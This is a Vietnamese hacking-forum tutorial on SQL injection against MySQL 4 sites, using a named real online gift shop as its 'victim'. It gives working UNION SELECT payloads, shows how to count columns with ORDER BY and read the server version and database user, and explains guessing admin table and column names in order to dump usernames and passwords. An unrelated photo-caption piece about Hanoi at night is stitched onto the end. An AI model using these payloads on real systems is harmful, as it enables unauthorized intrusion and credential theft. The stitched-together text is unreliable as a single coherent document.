Tut đoán table dựa theo tên user hoặc tên viết tắt của Web php>v4

Tut hack Php Sql injection v4 writing by FLo
vICtIm : https://www.giftsfromfinland.com/pro...=52&prodID=436
Checked : https://www.giftsfromfinland.com/pro...=52&prodID=436 thêm dấu ' nhá ! > á à mày chết với ông

Ơ lạ nhỉ checked thế quái nào nó lại hiện lên trang trắng thế kia , thử order by cái , có nhiều cách order by để thực hiện

ở đây Flo sài Order by number ( dịch theo tiếng việt nôm na là số ) > number cứ tăng dần đến khi nào xuất hiện number lỗi thì thôi

Thường FLo cứ kiểm tra order by 1 , ko ra gì , order by 100 > trang trắng

vậy ta sẽ order by từ 1 đến khi nào ra số lỗi thì thôi

https://www.giftsfromfinland.com/pro...=52&prodID=436 order by 2 > order by đến 17 vẫn ko có gì



order by đến 18 > Tự nhiên số 17 còn bt , sang 18 là trang trắng > suy ra là số truy vấn trên website với SQL là 17 Field




giờ ta thêm dấu - vào trước số 436 nhé

https://www.giftsfromfinland.com/pro..._ID=52&prodID=-436

Và FLo sử dụng câu lệnh

Code:

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

anh em nhìn thấy số 3 ko > nếu nhìn thấy số 3 anh em ta sẽ thay số 3 ở trên thành version() để kiểm tra version của shop , thay database() để kiểm tra database , thay user() để kiểm tra user của shop

Version ở đây là 4.1.22-log
User : gff_user@localhost
Database : current_gff_data

Tại sao ta cần những thông tin như database , user > vì ver4 này củ chuối cái là phải đoán table lẫn column > dựa vào đó mà đoán thôi

Tiếp đó đến đoán table nào
Bt sẽ đoán các table như là admin , orders .......... nhưng ko đc > nên chú ý kỹ lại tên user nên FLo với nghĩ ra và thử

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from gff_admin--


sử dụng đúng câu truy vấn thì nó sẽ trả về site như lúc bình thường
Còn nếu đoán column thì anh em đoán tên từng column thay vào số 3 > khi cảm thấy đủ rồi thì với dùng lệnh

concat(id,0x7c, các tên columnxxxx , 0x7c )


0x7c là FLo sài site http://string-functions.com/string-hex.aspx conver từ ký tự | sang 7c > còn 0x luôn luôn đứng trước các hex

Đoán column thì lắm lúc đơn giản là thế này > anh em đi tìm link admin của site trước sau đó viewsource đoạn username và password rồi thử thôi ;))

Và khi đoán 1 số columns cũng có shop đặt theo tên viết tắt của shop gồm những từ như workpress > là wp
wp_users
wp_user


P/s : victim có thể bị fix nên tut trên đây của FLo chỉ là tham khảo

Hà Nội về đêm

Những con phố chìm trong bóng tối, ánh sáng từ các ngọn đèn le lói hắt ra qua ô cửa sổ nhỏ, những người lao động cặm cụi làm việc... Đêm mùa đông, Hà Nội hiện lên vẻ trầm lắng, nên thơ.




Hà Nội tràn ngập ánh đèn khi trời tối dần.



Tháp Rùa hồ Gươm lung linh.



Phố Đinh Liệt lúc 0h. Nhà nhà đóng kín cửa, chỉ còn ánh sáng của các ngọn đèn hắt qua cửa, đèn ôtô và xe máy.



Phố Hàng Cá không một bóng người qua lại. Một chiếc xe tuần tra đỗ bên lề của cảnh sát khu vực sẵn sàng làm nhiệm vụ.



Con phố này (Hàng Chiếu), ban ngày sầm uất những hàng kinh doanh vỉa hè, đêm đến đìu hiu, vắng vẻ.



Hai khung cửa sổ bừng sáng trong đêm.



Cửa Ô Quan Chưởng, nơi mang nhiều dấu ấn lịch sử của Hà Nội.



Người bán hàng ăn thu dọn đồ đạc.



Chị công nhân quét rác cặm cụi làm việc.



Hàng bánh bao đêm.



Người nước ngoài thong dong dạo phố tận hưởng không khí đêm Hà Nội.



Hai người thợ phụ nề đến công trường làm đêm.





Cầu Chương Dương (trên) và Long Biên đèn sáng trưng.



Người nhặt rác lầm lũi kiếm sống trong đêm.